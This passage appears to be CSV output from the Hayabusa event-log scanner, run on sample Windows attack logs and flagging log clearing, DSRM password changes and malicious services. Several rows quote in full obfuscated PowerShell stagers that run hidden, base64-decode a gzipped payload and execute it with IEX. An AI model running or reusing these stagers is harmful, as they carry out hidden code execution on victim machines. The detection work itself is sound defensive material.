IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus 